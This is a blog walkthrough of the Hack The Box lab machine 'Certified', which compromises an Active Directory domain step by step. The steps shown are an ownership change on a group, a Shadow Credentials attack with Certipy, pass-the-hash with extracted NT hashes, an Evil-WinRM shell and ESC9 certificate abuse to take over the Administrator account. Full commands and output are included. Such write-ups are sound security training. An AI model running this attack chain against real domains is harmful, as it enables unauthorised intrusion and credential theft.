Certified - Hack The Box

Certified - Hack The Box

Sebin Thomas
  2025-03-15 08:02 2025-03-15 08:02 Created   2025-03-31 12:09:11 2025-03-31 12:09:11 Updated    2.9k Words  18 Mins

We began with the low-privileged user JUDITH.MADER@CERTIFIED.HTB, who had the ability to modify the owner of MANAGEMENT@CERTIFIED.HTB. By changing ownership, we added a controlled user to this group, escalating privileges. Next, we exploited GenericWrite permissions of MANAGEMENT@CERTIFIED.HTB over MANAGEMENT_SVC@CERTIFIED.HTB, allowing us to modify attributes and gain access as MANAGEMENT_SVC.

This account had GenericAll over CA_OPERATOR@CERTIFIED.HTB, enabling a full takeover. With control over CA_OPERATOR, we identified potential privileges related to Active Directory Certificate Services (AD CS). Using this, we requested a certificate for the Administrator account, obtained a TGT and extracted the NT hash, allowing us to authenticate as Administrator on the Domain Controller (DC) and achieve full domain compromise.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
➜  Certified nmap -sCV certified.htb -v                             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:39 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Initiating Ping Scan at 07:39
Scanning certified.htb (10.10.11.41) [4 ports]
Completed Ping Scan at 07:39, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:39
Scanning certified.htb (10.10.11.41) [1000 ports]
Discovered open port 53/tcp on 10.10.11.41
Discovered open port 445/tcp on 10.10.11.41
Discovered open port 135/tcp on 10.10.11.41
Discovered open port 139/tcp on 10.10.11.41
Discovered open port 3269/tcp on 10.10.11.41
Discovered open port 5985/tcp on 10.10.11.41
Discovered open port 593/tcp on 10.10.11.41
Discovered open port 389/tcp on 10.10.11.41
Discovered open port 88/tcp on 10.10.11.41
Discovered open port 636/tcp on 10.10.11.41
Discovered open port 464/tcp on 10.10.11.41
Discovered open port 3268/tcp on 10.10.11.41
Completed SYN Stealth Scan at 07:40, 26.07s elapsed (1000 total ports)
Initiating Service scan at 07:40
Scanning 12 services on certified.htb (10.10.11.41)
Completed Service scan at 07:41, 60.07s elapsed (12 services on 1 host)
NSE: Script scanning 10.10.11.41.
Initiating NSE at 07:41
Completed NSE at 07:41, 41.33s elapsed
Initiating NSE at 07:41
Completed NSE at 07:42, 10.69s elapsed
Initiating NSE at 07:42
Completed NSE at 07:42, 0.00s elapsed
Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.38s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-24 12:46:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-02-24T12:48:14+00:00; +6m16s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-24T12:48:13+00:00; +6m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-02-24T12:48:14+00:00; +6m16s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-24T12:48:13+00:00; +6m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6m15s, deviation: 1s, median: 6m15s
| smb2-time: 
|   date: 2025-02-24T12:47:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
Initiating NSE at 07:42
Completed NSE at 07:42, 0.00s elapsed
Initiating NSE at 07:42
Completed NSE at 07:42, 0.00s elapsed
Initiating NSE at 07:42
Completed NSE at 07:42, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.20 seconds
           Raw packets sent: 2003 (88.108KB) | Rcvd: 25 (1.080KB)
➜  Certified 
1
2
3
4
➜  Certified nxc smb certified.htb -u judith.mader -p judith09        
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
➜  Certified

Bloodhound

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
➜  Certified bloodhound-python -ns 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' --zip -c all --dns-tcp
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.41:445)] timed out
INFO: Done in 01M 44S
INFO: Compressing output into 20250224075146_bloodhound.zip
➜  Certified unzip 20250224075146_bloodhound.zip 
Archive:  20250224075146_bloodhound.zip
 extracting: 20250224075146_users.json  
 extracting: 20250224075146_containers.json  
 extracting: 20250224075146_gpos.json  
 extracting: 20250224075146_groups.json  
 extracting: 20250224075146_computers.json  
 extracting: 20250224075146_ous.json  
 extracting: 20250224075146_domains.json  
➜  Certified

User attack path

Attack path

BloodHound Findings & Exploitation Path

  • JUDITH.MADER@CERTIFIED.HTB → Can modify the owner of MANAGEMENT@CERTIFIED.HTB.
  • MANAGEMENT@CERTIFIED.HTB → Has GenericWrite over MANAGEMENT_SVC@CERTIFIED.HTB.
  • MANAGEMENT_SVC@CERTIFIED.HTB → Has GenericAll over CA_OPERATOR@CERTIFIED.HTB.

Attack Flow

  • Modify MANAGEMENT@CERTIFIED.HTB ownership to gain control.
  • Abuse GenericWrite to modify MANAGEMENT_SVC and escalate privileges.
  • Leverage GenericAll to take over CA_OPERATOR, potentially leading to further AD privilege escalation.

The attack starts with JUDITH.MADER, who has the ability to change the owner of the Management group. By transferring ownership to that user, JUDITH.MADER gains full control over the group. Next, GenericAll permissions are granted to Management, allowing JUDITH.MADER to modify its members and add JUDITH.MADER to the group. Since Management group members have GenericWrite on Management_SVC, JUDITH.MADER can abuse this permission to perform a Shadow Credentials attack. Using Certipy, JUDITH.MADER can add a malicious Key Credential to Management_SVC, retrieves a TGT & NT hash, and authenticates as that user. Finally, since Management_SVC has GenericAll over CA_Operator, JUDITH.MADER can take full control of CA_Operator.

User

Change Ownership of the Management Group:
→ Transfers ownership of the Management group to judith.mader, allowing full control over the group.

1
2
3
4
5
6
7
8
➜  Certified owneredit.py -action write -new-owner 'judith.mader' -target 'management' 'certified.htb'/'judith.mader':'judith09'        
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!

Grant Full Control Over Management Group:
→ Gives judith.mader GenericAll (full control) over management group.

1
2
➜  Certified bloodyAD --host "certified.htb" -d certified.htb -u judith.mader -p judith09 add genericAll "management" "judith.mader"
[+] judith.mader has now GenericAll on management

Add Judith to Management Group:
→ Adds judith.mader as a member of management group.

1
2
3
➜  Certified bloodyAD --host "certified.htb" -d certified.htb -u judith.mader -p judith09 add groupMember "management" "judith.mader"

[+] judith.mader added to management

Perform Shadow Credentials Attack on Management_SVC:
→ Adds a new Key Credential to management_svc, authenticates using PKINIT, retrieves its TGT & NT hash, and restores the original Key Credential.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  Certified certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9623dcf6-e631-fbad-dd02-e8f4cbe03f88'
[*] Adding Key Credential with device ID '9623dcf6-e631-fbad-dd02-e8f4cbe03f88' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '9623dcf6-e631-fbad-dd02-e8f4cbe03f88' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
➜  Certified 
1
2
3
4
➜  Certified nxc smb certified.htb -u management_Svc -H a091c1832bcdd4677c28b5a6a1295584                               
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\management_Svc:a091c1832bcdd4677c28b5a6a1295584 
➜  Certified

Now we can use Evil-WinRM to login to machine.

1
2
3
4
5
6
7
8
9
10
➜  Certified evil-winrm -i certified.htb -u management_Svc -H a091c1832bcdd4677c28b5a6a1295584                                
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>

Root

Root attack path

The user MANAGEMENT_SVC@CERTIFIED.HTB has GenericAll privileges to the user CA_OPERATOR@CERTIFIED.HTB.
With Management_SVC having GenericAll on CA_Operator, we fully control the account. Using the NT hash from Shadow Credentials, we authenticate as CA_Operator.

→ Exploits Shadow Credentials to take over CA_OPERATOR using Certipy.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  Certified certipy shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator                                        
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4f17b9c2-939a-7851-82be-1e3eb5190ffe'
[*] Adding Key Credential with device ID '4f17b9c2-939a-7851-82be-1e3eb5190ffe' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '4f17b9c2-939a-7851-82be-1e3eb5190ffe' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 259745cb123a52aa2e693aaacca2db52

→ Extracts NT hash of CA_OPERATOR, enabling pass-the-hash authentication.

1
2
3
➜  Certified nxc smb certified.htb -u ca_operator -H 259745cb123a52aa2e693aaacca2db52                        
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:259745cb123a52aa2e693aaacca2db52

ESC-9 vulnerabilty exploitation

By using certipy i saw that there is an ADCS ESC9 vuln

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
➜  Certified certipy find -dc-ip 10.10.11.41 -u ca_operator -hashes :259745cb123a52aa2e693aaacca2db52 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals       : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
➜  Certified

Now we can modify UPN of CA_OPERATOR to Administrator, enabling certificate forgery.

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  Certified certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.18.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'
➜  Certified

Requesting an Administrator Certificate via Certipy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜  Certified certipy req -username ca_operator@certified.htb -hashes :259745cb123a52aa2e693aaacca2db52 -ca certified-DC01-CA -template CertifiedAuthentication -target 10.10.11.41 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.18.2'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 46
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
➜  Certified

Now we can obtain a TGT and NT Hash Using the Administrator Certificate

1
2
3
4
5
6
7
8
9
10
11
➜  Certified certipy auth -pfx administrator.pfx -domain certified.htb

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
➜  Certified

Successfully Authenticating as Administrator on the Domain Controller

1
2
3
4
➜  Certified nxc smb certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\administrator:0d5b49608bbce1751f708748f67e2d34 (Pwn3d!)
➜  Certified
  • Title: Certified - Hack The Box
  • Author: Sebin Thomas
  • Created at : 2025-03-15 08:02:00
  • Updated at : 2025-03-31 12:09:11
  • Link: https://0xsebin-blogs.vercel.app/2025/03/15/Certified/
  • License: All Rights Reserved © Sebin Thomas
Comments
On this page
Certified - Hack The Box
  1. Nmap
    1. Bloodhound
    2. Attack path
  2. User
  3. Root
    1. ESC-9 vulnerabilty exploitation